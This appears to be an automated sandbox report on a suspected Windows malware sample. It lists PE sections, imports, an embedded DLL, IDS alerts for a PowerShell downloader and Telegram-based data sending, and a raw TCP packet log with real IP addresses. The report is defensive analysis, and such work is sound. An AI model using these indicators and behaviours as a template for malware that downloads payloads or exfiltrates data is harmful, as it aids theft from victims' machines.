                                                                                                                                                                                      add eax, FFFCF9B0h
                                                                                                                                                                                      cmp eax, 20h
                                                                                                                                                                                      jnbe 00007F1794B8B9C6h
                                                                                                                                                                                      dec eax
                                                                                                                                                                                      mov ecx, 00010001h

                                                                                                                                                                                      Rich Headers

                                                                                                                                                                                      Programming Language:
                                                                                                                                                                                      • [IMP] VS2008 SP1 build 30729

                                                                                                                                                                                      Data Directories

                                                                                                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x7966f00xc4.rdata
                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x7967b40x168.rdata
                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x8070000x157bb0.rsrc
                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x7ba0000x360fc.pdata
                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x95f0000x7e2c.reloc
                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x70a6b00x54.rdata
                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x70a8800x28.rdata
                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x6245400x140.rdata
                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x61d0000xec8.rdata
                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x7964a40x60.rdata
                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                      Sections

                                                                                                                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                      .text0x10000x61a71c0x61a8000b10188502e90294dafc4ec1ab7c7e1aunknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                      .CLR_UEF0x61c0000xdd0x2003e60305f40e8c29615347b62e95ffa2cFalse0.4140625zlib compressed data3.093020747643803IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                      .rdata0x61d0000x17c5e20x17c600ccea3fd4e581a51a1f647847625a49adFalse0.4178410234554716data5.662369206074474IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                      .data0x79a0000x1ffc40x9800299802f418a9035333b55e293f49d1d4False0.19793379934210525data3.334456628912645IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                      .pdata0x7ba0000x360fc0x36200fd626080e4e3733af1f84cb0f28f455dFalse0.5045602987875288data6.505480901328782IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                      .didat0x7f10000x380x200910157a66b34b7706f92927705a37f5aFalse0.064453125data0.42449845906755646IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                      Section0x7f20000x80x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                      _RDATA0x7f30000x132080x13400617430a8cd708dda1865fee2910d8a1aFalse0.18454494724025974data5.4827244286074395IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                      .rsrc0x8070000x157bb00x157c00de7e28b9db66801685543e24971703a5False0.4153728693181818data6.305049331993507IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                      .reloc0x95f0000x7e2c0x8000dca4e44fa2a43d7401fa4c38300ecb87False0.155853271484375data5.445611795477199IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                                      Resources

                                                                                                                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                      RT_ICON0x8072000x10828Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 80630 x 80630 px/m0.0639417958121377
                                                                                                                                                                                      RT_RCDATA0x817a280x24data1.1666666666666667
                                                                                                                                                                                      RT_RCDATA0x817a4c0x24data1.1666666666666667
                                                                                                                                                                                      RT_RCDATA0x817a700x146c10PE32+ executable (DLL) (GUI) x86-64, for MS Windows0.4392890930175781
                                                                                                                                                                                      RT_GROUP_ICON0x95e6800x14data1.15
                                                                                                                                                                                      RT_VERSION0x95e6940x2c0data0.4318181818181818
                                                                                                                                                                                      RT_MANIFEST0x95e9540x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                                                                                                                                                      Imports

                                                                                                                                                                                      DLLImport
                                                                                                                                                                                      KERNEL32.dllRaiseException, FreeLibrary, SetErrorMode, RaiseFailFastException, GetExitCodeProcess, TerminateProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, AddVectoredExceptionHandler, MultiByteToWideChar, GetTickCount, FlushInstructionCache, QueryPerformanceFrequency, QueryPerformanceCounter, RtlLookupFunctionEntry, LocateXStateFeature, RtlDeleteFunctionTable, InterlockedPushEntrySList, InterlockedFlushSList, InitializeSListHead, GetTickCount64, DuplicateHandle, QueueUserAPC, WaitForSingleObjectEx, SetThreadPriority, GetThreadPriority, GetCurrentThreadId, TlsAlloc, GetCurrentThread, GetCurrentProcessId, CreateThread, GetModuleHandleW, WaitForMultipleObjectsEx, SignalObjectAndWait, RtlCaptureContext, SetThreadStackGuarantee, VirtualQuery, WriteFile, GetStdHandle, GetConsoleOutputCP, MapViewOfFileEx, UnmapViewOfFile, GetStringTypeExW, InterlockedPopEntrySList, ExitProcess, Sleep, CreateMemoryResourceNotification, VirtualAlloc, VirtualFree, VirtualProtect, SleepEx, SwitchToThread, SuspendThread, ResumeThread, InitializeContext, SetXStateFeaturesMask, RtlRestoreContext, CloseThreadpoolTimer, CreateThreadpoolTimer, SetThreadpoolTimer, ReadFile, GetFileSize, GetEnvironmentVariableW, SetEnvironmentVariableW, CreateEventW, SetEvent, ResetEvent, GetThreadContext, SetThreadContext, GetEnabledXStateFeatures, CopyContext, WerRegisterRuntimeExceptionModule, RtlInstallFunctionTableCallback, GetSystemDefaultLCID, GetUserDefaultLCID, RtlUnwind, HeapAlloc, HeapFree, GetProcessHeap, HeapCreate, HeapDestroy, GetEnvironmentStringsW, FreeEnvironmentStringsW, FormatMessageW, CreateSemaphoreExW, ReleaseSemaphore, GetACP, LCMapStringEx, LocalFree, VerSetConditionMask, VerifyVersionInfoW, QueryThreadCycleTime, GetLogicalProcessorInformationEx, SetThreadGroupAffinity, GetThreadGroupAffinity, GetProcessGroupAffinity, GetCurrentProcessorNumberEx, GetProcessAffinityMask, QueryInformationJobObject, CloseHandle, GetSystemTimeAsFileTime, GetModuleFileNameW, CreateProcessW, GetCPInfo, LoadLibraryExW, CreateFileW, GetFileAttributesExW, GetFullPathNameW, LoadLibraryExA, OutputDebugStringA, OpenEventW, ReleaseMutex, ExitThread, CreateMutexW, HeapReAlloc, CreateNamedPipeA, WaitForMultipleObjects, DisconnectNamedPipe, CreateFileA, CancelIoEx, GetOverlappedResult, ConnectNamedPipe, FlushFileBuffers, SetFilePointer, MapViewOfFile, GetActiveProcessorGroupCount, GetSystemTime, SetConsoleCtrlHandler, GetLocaleInfoEx, GetUserDefaultLocaleName, RtlAddFunctionTable, LoadLibraryW, CreateDirectoryW, RemoveDirectoryW, CreateActCtxW, ActivateActCtx, FindResourceW, GetWindowsDirectoryW, GetFileSizeEx, FindFirstFileExW, FindNextFileW, GetTempPathW, FindClose, LoadLibraryA, GetCurrentDirectoryW, IsWow64Process, EncodePointer, DecodePointer, CreateFileMappingA, TlsSetValue, TlsGetValue, GetSystemInfo, GetCurrentProcess, OutputDebugStringW, IsDebuggerPresent, LeaveCriticalSection, EnterCriticalSection, DeleteCriticalSection, InitializeCriticalSection, WideCharToMultiByte, GetCommandLineW, GetProcAddress, GetModuleHandleExW, SetThreadErrorMode, FlushProcessWriteBuffers, SetLastError, DebugBreak, WaitForSingleObject, GetNumaHighestNodeNumber, SetThreadAffinityMask, SetThreadIdealProcessorEx, GetThreadIdealProcessorEx, VirtualAllocExNuma, GetNumaProcessorNodeEx, VirtualUnlock, GetLargePageMinimum, IsProcessInJob, K32GetProcessMemoryInfo, GetLogicalProcessorInformation, GlobalMemoryStatusEx, ReleaseSRWLockExclusive, AcquireSRWLockExclusive, WakeAllConditionVariable, SleepConditionVariableSRW, RtlVirtualUnwind, IsProcessorFeaturePresent, RtlUnwindEx, InitializeCriticalSectionAndSpinCount, TlsFree, RtlPcToFileHeader, TryAcquireSRWLockExclusive, GetExitCodeThread, GetStringTypeW, InitializeCriticalSectionEx, GetLastError, CreateFileMappingW
                                                                                                                                                                                      ADVAPI32.dllReportEventW, AdjustTokenPrivileges, RegGetValueW, SetKernelObjectSecurity, GetSidSubAuthorityCount, GetSidSubAuthority, GetTokenInformation, OpenProcessToken, DeregisterEventSource, RegisterEventSourceW, RegQueryValueExW, RegOpenKeyExW, RegCloseKey, EventRegister, SetThreadToken, RevertToSelf, OpenThreadToken, EventWriteTransfer, EventWrite, LookupPrivilegeValueW
                                                                                                                                                                                      ole32.dllCreateStreamOnHGlobal, CoRevokeInitializeSpy, CoGetClassObject, CoGetContextToken, CoGetObjectContext, CoUnmarshalInterface, CoMarshalInterface, CoGetMarshalSizeMax, CLSIDFromProgID, CoReleaseMarshalData, CoTaskMemFree, CoTaskMemAlloc, CoCreateGuid, CoInitializeEx, CoRegisterInitializeSpy, CoWaitForMultipleHandles, CoUninitialize, CoCreateFreeThreadedMarshaler
                                                                                                                                                                                      OLEAUT32.dllCreateErrorInfo, SysFreeString, GetErrorInfo, SetErrorInfo, SysStringLen, SysAllocString, SysAllocStringLen, SafeArrayGetDim, SafeArrayGetLBound, SafeArrayDestroy, QueryPathOfRegTypeLib, LoadTypeLibEx, SafeArrayGetVartype, VariantChangeType, VariantChangeTypeEx, VariantClear, VariantInit, VarCyFromDec, SafeArrayAllocDescriptorEx, GetRecordInfoFromTypeInfo, SafeArraySetRecordInfo, SafeArrayAllocData, SafeArrayGetElemsize, SysStringByteLen, SysAllocStringByteLen, SafeArrayCreateVector, SafeArrayPutElement, LoadRegTypeLib
                                                                                                                                                                                      USER32.dllLoadStringW, MessageBoxW
                                                                                                                                                                                      SHELL32.dllShellExecuteW
                                                                                                                                                                                      api-ms-win-crt-string-l1-1-0.dllstrncat_s, wcsncat_s, strcmp, wcsnlen, wcscat_s, towupper, iswascii, _strdup, strncpy, strnlen, wcstok_s, isdigit, isupper, isalpha, towlower, _wcsdup, iswspace, isspace, islower, strtok_s, _wcsnicmp, strcspn, __strncnt, strlen, wcscpy_s, toupper, wcsncpy_s, strcpy_s, strcat_s, strncpy_s, _strnicmp, tolower, wcsncmp, iswupper, strncmp, _stricmp, _wcsicmp
                                                                                                                                                                                      api-ms-win-crt-stdio-l1-1-0.dll__stdio_common_vsscanf, fflush, __acrt_iob_func, __stdio_common_vfprintf, __stdio_common_vswprintf, __stdio_common_vfwprintf, fputws, fputwc, _get_stream_buffer_pointers, _fseeki64, fread, fsetpos, ungetc, fgetpos, fgets, fgetc, fputc, _wfsopen, _wfopen, __p__commode, _set_fmode, __stdio_common_vsnprintf_s, setvbuf, _setmode, _dup, _fileno, ftell, fseek, fputs, __stdio_common_vsnwprintf_s, __stdio_common_vsprintf_s, fwrite, _flushall, fopen, fclose
                                                                                                                                                                                      api-ms-win-crt-runtime-l1-1-0.dll_crt_atexit, _cexit, _seh_filter_exe, _set_app_type, _register_onexit_function, _configure_wide_argv, _initialize_wide_environment, _get_initial_wide_environment, _initterm, _initterm_e, _exit, _invalid_parameter_noinfo_noreturn, __p___argc, __p___wargv, _c_exit, _register_thread_local_exe_atexit_callback, _initialize_onexit_table, _beginthreadex, terminate, _controlfp_s, _wcserror_s, _invalid_parameter_noinfo, _errno, exit, abort
                                                                                                                                                                                      api-ms-win-crt-convert-l1-1-0.dll_atoi64, _ltow_s, _wtoi, strtoul, _wcstoui64, atol, _itow_s, strtoull, wcstoul
                                                                                                                                                                                      api-ms-win-crt-heap-l1-1-0.dllfree, _set_new_mode, calloc, malloc, realloc
                                                                                                                                                                                      api-ms-win-crt-utility-l1-1-0.dllqsort
                                                                                                                                                                                      api-ms-win-crt-math-l1-1-0.dllasinhf, atanhf, cbrtf, acoshf, cosh, cbrt, coshf, exp, expf, acosh, atanh, floor, floorf, fma, fmaf, cosf, _fdopen, cos, ceilf, _copysignf, _isnanf, trunc, truncf, ilogb, ilogbf, tanhf, ceil, fmod, fmodf, atanf, frexp, atan2f, atan2, log, log10, log10f, atan, asinf, log2, log2f, logf, pow, powf, sin, sinf, asin, sinh, sinhf, sqrt, sqrtf, tan, tanf, tanh, acosf, _copysign, asinh, _isnan, _finite, modf, modff, acos, __setusermatherr
                                                                                                                                                                                      api-ms-win-crt-time-l1-1-0.dll_time64, _gmtime64_s, wcsftime
                                                                                                                                                                                      api-ms-win-crt-environment-l1-1-0.dllgetenv
                                                                                                                                                                                      api-ms-win-crt-locale-l1-1-0.dll_unlock_locales, setlocale, __pctype_func, ___lc_locale_name_func, _lock_locales, ___lc_codepage_func, ___mb_cur_max_func, _configthreadlocale, localeconv
                                                                                                                                                                                      api-ms-win-crt-filesystem-l1-1-0.dll_wrename, _unlock_file, _wremove, _lock_file

                                                                                                                                                                                      Exports

                                                                                                                                                                                      NameOrdinalAddress
                                                                                                                                                                                      CLRJitAttachState30x1407af270
                                                                                                                                                                                      DotNetRuntimeInfo40x14079c5d0
                                                                                                                                                                                      MetaDataGetDispenser50x140571160
                                                                                                                                                                                      g_CLREngineMetrics20x14079bdd8
                                                                                                                                                                                      g_dacTable60x140644600

                                                                                                                                                                                      Version Infos

                                                                                                                                                                                      DescriptionData
                                                                                                                                                                                      Translation0x0000 0x04b0
                                                                                                                                                                                      CompanyNameWorkTeam
                                                                                                                                                                                      FileDescriptionWorkTeam
                                                                                                                                                                                      FileVersion1.0.0.0
                                                                                                                                                                                      InternalNameWorkTeam.dll
                                                                                                                                                                                      LegalCopyright
                                                                                                                                                                                      OriginalFilenameWorkTeam.dll
                                                                                                                                                                                      ProductNameWorkTeam
                                                                                                                                                                                      ProductVersion1.0.0
                                                                                                                                                                                      Assembly Version1.0.0.0

                                                                                                                                                                                      Network Behavior

                                                                                                                                                                                      Suricata IDS Alerts

                                                                                                                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                      2025-02-17T18:57:13.834460+01001810000Joe Security ANOMALY Windows PowerShell HTTP activity2192.168.2.549704172.67.19.24443TCP
                                                                                                                                                                                      2025-02-17T18:57:28.713715+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549714172.67.74.15280TCP
                                                                                                                                                                                      2025-02-17T18:57:29.182389+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549720208.95.112.180TCP
                                                                                                                                                                                      2025-02-17T18:57:32.313996+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549726149.154.167.220443TCP
                                                                                                                                                                                      2025-02-17T18:57:32.313996+01001810007Joe Security ANOMALY Telegram Send Message1192.168.2.549726149.154.167.220443TCP
                                                                                                                                                                                      2025-02-17T18:57:54.801700+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.56079189.23.97.21480TCP
                                                                                                                                                                                      2025-02-17T18:57:54.802006+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.56079289.23.97.21480TCP
                                                                                                                                                                                      2025-02-17T18:58:16.186836+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.55967289.23.97.21480TCP
                                                                                                                                                                                      2025-02-17T18:58:16.191757+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.55967189.23.97.21480TCP
                                                                                                                                                                                      2025-02-17T18:58:37.606294+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.55978789.23.97.21480TCP
                                                                                                                                                                                      2025-02-17T18:58:37.609819+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.55978689.23.97.21480TCP
                                                                                                                                                                                      2025-02-17T18:58:59.015165+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.55978889.23.97.21480TCP
                                                                                                                                                                                      2025-02-17T18:58:59.030826+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.55978989.23.97.21480TCP
                                                                                                                                                                                      2025-02-17T18:58:59.697743+01001810007Joe Security ANOMALY Telegram Send Message1192.168.2.559791149.154.167.220443TCP
                                                                                                                                                                                      2025-02-17T18:58:59.702364+01001810007Joe Security ANOMALY Telegram Send Message1192.168.2.559790149.154.167.220443TCP

                                                                                                                                                                                      Network Port Distribution

                                                                                                                                                                                      TCP Packets

                                                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                      Feb 17, 2025 18:57:13.077548027 CET49704443192.168.2.5172.67.19.24
                                                                                                                                                                                      Feb 17, 2025 18:57:13.077619076 CET44349704172.67.19.24192.168.2.5
                                                                                                                                                                                      Feb 17, 2025 18:57:13.077897072 CET49704443192.168.2.5172.67.19.24
                                                                                                                                                                                      Feb 17, 2025 18:57:13.094769001 CET49704443192.168.2.5172.67.19.24
                                                                                                                                                                                      Feb 17, 2025 18:57:13.094818115 CET44349704172.67.19.24192.168.2.5
                                                                                                                                                                                      Feb 17, 2025 18:57:13.618489027 CET44349704172.67.19.24192.168.2.5
                                                                                                                                                                                      Feb 17, 2025 18:57:13.618603945 CET49704443192.168.2.5172.67.19.24
                                                                                                                                                                                      Feb 17, 2025 18:57:13.639906883 CET49704443192.168.2.5172.67.19.24
                                                                                                                                                                                      Feb 17, 2025 18:57:13.639951944 CET44349704172.67.19.24192.168.2.5
                                                                                                                                                                                      Feb 17, 2025 18:57:13.640913010 CET44349704172.67.19.24192.168.2.5
                                                                                                                                                                                      Feb 17, 2025 18:57:13.656120062 CET49704443192.168.2.5172.67.19.24
                                                                                                                                                                                      Feb 17, 2025 18:57:13.699332952 CET44349704172.67.19.24192.168.2.5
                                                                                                                                                                                      Feb 17, 2025 18:57:13.834434986 CET44349704172.67.19.24192.168.2.5
                                                                                                                                                                                      Feb 17, 2025 18:57:13.834469080 CET44349704172.67.19.24192.168.2.5
                                                                                                                                                                                      Feb 17, 2025 18:57:13.834487915 CET44349704172.67.19.24192.168.2.5
                                                                                                                                                                                      Feb 17, 2025 18:57:13.834503889 CET44349704172.67.19.24192.168.2.5
                                                                                                                                                                                      Feb 17, 2025 18:57:13.834522009 CET44349704172.67.19.24192.168.2.5
                                                                                                                                                                                      Feb 17, 2025 18:57:13.834527016 CET49704443192.168.2.5172.67.19.24
                                                                                                                                                                                      Feb 17, 2025 18:57:13.834573030 CET44349704172.67.19.24192.168.2.5
                                                                                                                                                                                      Feb 17, 2025 18:57:13.834605932 CET49704443192.168.2.5172.67.19.24
                                                                                                                                                                                      Feb 17, 2025 18:57:13.834630966 CET49704443192.168.2.5172.67.19.24
                                                                                                                                                                                      Feb 17, 2025 18:57:13.834635973 CET44349704172.67.19.24192.168.2.5
                                                                                                                                                                                      Feb 17, 2025 18:57:13.834681034 CET49704443192.168.2.5172.67.19.24
                                                                                                                                                                                      Feb 17, 2025 18:57:13.872029066 CET49704443192.168.2.5172.67.19.24
                                                                                                                                                                                      Feb 17, 2025 18:57:28.110913992 CET4971480192.168.2.5172.67.74.152
                                                                                                                                                                                      Feb 17, 2025 18:57:28.115839005 CET8049714172.67.74.152192.168.2.5
                                                                                                                                                                                      Feb 17, 2025 18:57:28.115940094 CET4971480192.168.2.5172.67.74.152
                                                                                                                                                                                      Feb 17, 2025 18:57:28.128469944 CET4971480192.168.2.5172.67.74.152
                                                                                                                                                                                      Feb 17, 2025 18:57:28.133394957 CET8049714172.67.74.152192.168.2.5
                                                                                                                                                                                      Feb 17, 2025 18:57:28.598639965 CET8049714172.67.74.152192.168.2.5
                                                                                                                                                                                      Feb 17, 2025 18:57:28.623639107 CET4972080192.168.2.5208.95.112.1
                                                                                                                                                                                      Feb 17, 2025 18:57:28.628510952 CET8049720208.95.112.1192.168.2.5
                                                                                                                                                                                      Feb 17, 2025 18:57:28.628601074 CET4972080192.168.2.5208.95.112.1
                                                                                                                                                                                      Feb 17, 2025 18:57:28.628977060 CET4972080192.168.2.5208.95.112.1
                                                                                                                                                                                      Feb 17, 2025 18:57:28.633802891 CET8049720208.95.112.1192.168.2.5
                                                                                                                                                                                      Feb 17, 2025 18:57:28.713715076 CET4971480192.168.2.5172.67.74.152
                                                                                                                                                                                      Feb 17, 2025 18:57:29.109947920 CET8049720208.95.112.1192.168.2.5
                                                                                                                                                                                      Feb 17, 2025 18:57:29.182389021 CET4972080192.168.2.5208.95.112.1
                                                                                                                                                                                      Feb 17, 2025 18:57:30.320305109 CET49726443192.168.2.5149.154.167.220
                                                                                                                                                                                      Feb 17, 2025 18:57:30.320396900 CET44349726149.154.167.220192.168.2.5
                                                                                                                                                                                      Feb 17, 2025 18:57:30.320477962 CET49726443192.168.2.5149.154.167.220
                                                                                                                                                                                      Feb 17, 2025 18:57:30.352426052 CET49726443192.168.2.5149.154.167.220
                                                                                                                                                                                      Feb 17, 2025 18:57:30.352473974 CET44349726149.154.167.220192.168.2.5
                                                                                                                                                                                      Feb 17, 2025 18:57:31.038124084 CET44349726149.154.167.220192.168.2.5
                                                                                                                                                                                      Feb 17, 2025 18:57:31.038211107 CET49726443192.168.2.5149.154.167.220
                                                                                                                                                                                      Feb 17, 2025 18:57:31.052067041 CET49726443192.168.2.5149.154.167.220
                                                                                                                                                                                      Feb 17, 2025 18:57:31.052100897 CET44349726149.154.167.220192.168.2.5
                                                                                                                                                                                      Feb 17, 2025 18:57:31.052619934 CET44349726149.154.167.220192.168.2.5
                                                                                                                                                                                      Feb 17, 2025 18:57:31.100770950 CET49726443192.168.2.5149.154.167.220
                                                                                                                                                                                      Feb 17, 2025 18:57:31.143371105 CET44349726149.154.167.220192.168.2.5
                                                                                                                                                                                      Feb 17, 2025 18:57:32.158756018 CET6077953192.168.2.51.1.1.1
                                                                                                                                                                                      Feb 17, 2025 18:57:32.163562059 CET53607791.1.1.1192.168.2.5
                                                                                                                                                                                      Feb 17, 2025 18:57:32.163635969 CET6077953192.168.2.51.1.1.1
                                                                                                                                                                                      Feb 17, 2025 18:57:32.168524027 CET53607791.1.1.1192.168.2.5
                                                                                                                                                                                      Feb 17, 2025 18:57:32.313852072 CET44349726149.154.167.220192.168.2.5
                                                                                                                                                                                      Feb 17, 2025 18:57:32.313926935 CET44349726149.154.167.220192.168.2.5
                                                                                                                                                                                      Feb 17, 2025 18:57:32.313990116 CET49726443192.168.2.5149.154.167.220
                                                                                                                                                                                      Feb 17, 2025 18:57:32.315993071 CET49726443192.168.2.5149.154.167.220
                                                                                                                                                                                      Feb 17, 2025 18:57:32.316040039 CET44349726149.154.167.220192.168.2.5
                                                                                                                                                                                      Feb 17, 2025 18:57:32.764226913 CET6077953192.168.2.51.1.1.1
                                                                                                                                                                                      Feb 17, 2025 18:57:32.770169020 CET53607791.1.1.1192.168.2.5
                                                                                                                                                                                      Feb 17, 2025 18:57:32.770308971 CET6077953192.168.2.51.1.1.1
                                                                                                                                                                                      Feb 17, 2025 18:57:33.328665018 CET6079180192.168.2.589.23.97.214
                                                                                                                                                                                      Feb 17, 2025 18:57:33.329040051 CET6079280192.168.2.589.23.97.214
                                                                                                                                                                                      Feb 17, 2025 18:57:33.334877014 CET806079189.23.97.214192.168.2.5
                                                                                                                                                                                      Feb 17, 2025 18:57:33.334950924 CET6079180192.168.2.589.23.97.214
                                                                                                                                                                                      Feb 17, 2025 18:57:33.335258961 CET6079180192.168.2.589.23.97.214
                                                                                                                                                                                      Feb 17, 2025 18:57:33.336530924 CET806079289.23.97.214192.168.2.5
                                                                                                                                                                                      Feb 17, 2025 18:57:33.336596966 CET6079280192.168.2.589.23.97.214
                                                                                                                                                                                      Feb 17, 2025 18:57:33.336797953 CET6079280192.168.2.589.23.97.214
                                                                                                                                                                                      Feb 17, 2025 18:57:33.342164993 CET806079189.23.97.214192.168.2.5
                                                                                                                                                                                      Feb 17, 2025 18:57:33.344069004 CET806079289.23.97.214192.168.2.5
                                                                                                                                                                                      Feb 17, 2025 18:57:33.768086910 CET5954553192.168.2.51.1.1.1
                                                                                                                                                                                      Feb 17, 2025 18:57:33.772900105 CET53595451.1.1.1192.168.2.5
                                                                                                                                                                                      Feb 17, 2025 18:57:33.772969007 CET5954553192.168.2.51.1.1.1
                                                                                                                                                                                      Feb 17, 2025 18:57:33.777811050 CET53595451.1.1.1192.168.2.5
                                                                                                                                                                                      Feb 17, 2025 18:57:34.285669088 CET5954553192.168.2.51.1.1.1
                                                                                                                                                                                      Feb 17, 2025 18:57:34.290774107 CET53595451.1.1.1192.168.2.5
                                                                                                                                                                                      Feb 17, 2025 18:57:34.290833950 CET5954553192.168.2.51.1.1.1
                                                                                                                                                                                      Feb 17, 2025 18:57:54.801604033 CET806079189.23.97.214192.168.2.5
                                                                                                                                                                                      Feb 17, 2025 18:57:54.801642895 CET806079289.23.97.214192.168.2.5
                                                                                                                                                                                      Feb 17, 2025 18:57:54.801700115 CET6079180192.168.2.589.23.97.214
                                                                                                                                                                                      Feb 17, 2025 18:57:54.802006006 CET6079280192.168.2.589.23.97.214
                                                                                                                                                                                      Feb 17, 2025 18:57:54.804536104 CET6079180192.168.2.589.23.97.214
                                                                                                                                                                                      Feb 17, 2025 18:57:54.805320024 CET6079280192.168.2.589.23.97.214
                                                                                                                                                                                      Feb 17, 2025 18:57:54.805614948 CET5967180192.168.2.589.23.97.214
                                                                                                                                                                                      Feb 17, 2025 18:57:54.805763006 CET5967280192.168.2.589.23.97.214
                                                                                                                                                                                      Feb 17, 2025 18:57:54.809329987 CET806079189.23.97.214192.168.2.5
                                                                                                                                                                                      Feb 17, 2025 18:57:54.810070992 CET806079289.23.97.214192.168.2.5
                                                                                                                                                                                      Feb 17, 2025 18:57:54.810381889 CET805967189.23.97.214192.168.2.5
                                                                                                                                                                                      Feb 17, 2025 18:57:54.810445070 CET5967180192.168.2.589.23.97.214
                                                                                                                                                                                      Feb 17, 2025 18:57:54.810514927 CET805967289.23.97.214192.168.2.5
                                                                                                                                                                                      Feb 17, 2025 18:57:54.810564041 CET5967280192.168.2.589.23.97.214
                                                                                                                                                                                      Feb 17, 2025 18:57:54.810682058 CET5967280192.168.2.589.23.97.214
                                                                                                                                                                                      Feb 17, 2025 18:57:54.810683012 CET5967180192.168.2.589.23.97.214
                                                                                                                                                                                      Feb 17, 2025 18:57:54.815433025 CET805967289.23.97.214192.168.2.5
                                                                                                                                                                                      Feb 17, 2025 18:57:54.815486908 CET805967189.23.97.214192.168.2.5
                                                                                                                                                                                      Feb 17, 2025 18:58:14.752540112 CET8049720208.95.112.1192.168.2.5
                                                                                                                                                                                      Feb 17, 2025 18:58:14.752621889 CET4972080192.168.2.5208.95.112.1
                                                                                                                                                                                      Feb 17, 2025 18:58:16.186717987 CET805967289.23.97.214192.168.2.5
                                                                                                                                                                                      Feb 17, 2025 18:58:16.186836004 CET5967280192.168.2.589.23.97.214
                                                                                                                                                                                      Feb 17, 2025 18:58:16.187205076 CET5967280192.168.2.589.23.97.214
                                                                                                                                                                                      Feb 17, 2025 18:58:16.188013077 CET5978680192.168.2.589.23.97.214
                                                                                                                                                                                      Feb 17, 2025 18:58:16.191678047 CET805967189.23.97.214192.168.2.5
                                                                                                                                                                                      Feb 17, 2025 18:58:16.191756964 CET5967180192.168.2.589.23.97.214
                                                                                                                                                                                      Feb 17, 2025 18:58:16.191966057 CET5967180192.168.2.589.23.97.214
                                                                                                                                                                                      Feb 17, 2025 18:58:16.192079067 CET805967289.23.97.214192.168.2.5
                                                                                                                                                                                      Feb 17, 2025 18:58:16.192477942 CET5978780192.168.2.589.23.97.214
                                                                                                                                                                                      Feb 17, 2025 18:58:16.192950010 CET805978689.23.97.214192.168.2.5
                                                                                                                                                                                      Feb 17, 2025 18:58:16.193022013 CET5978680192.168.2.589.23.97.214
                                                                                                                                                                                      Feb 17, 2025 18:58:16.193226099 CET5978680192.168.2.589.23.97.214
                                                                                                                                                                                      Feb 17, 2025 18:58:16.196753979 CET805967189.23.97.214192.168.2.5
                                                                                                                                                                                      Feb 17, 2025 18:58:16.197408915 CET805978789.23.97.214192.168.2.5
                                                                                                                                                                                      Feb 17, 2025 18:58:16.197491884 CET5978780192.168.2.589.23.97.214
                                                                                                                                                                                      Feb 17, 2025 18:58:16.197654009 CET5978780192.168.2.589.23.97.214
                                                                                                                                                                                      Feb 17, 2025 18:58:16.197993994 CET805978689.23.97.214192.168.2.5
                                                                                                                                                                                      Feb 17, 2025 18:58:16.202594995 CET805978789.23.97.214192.168.2.5
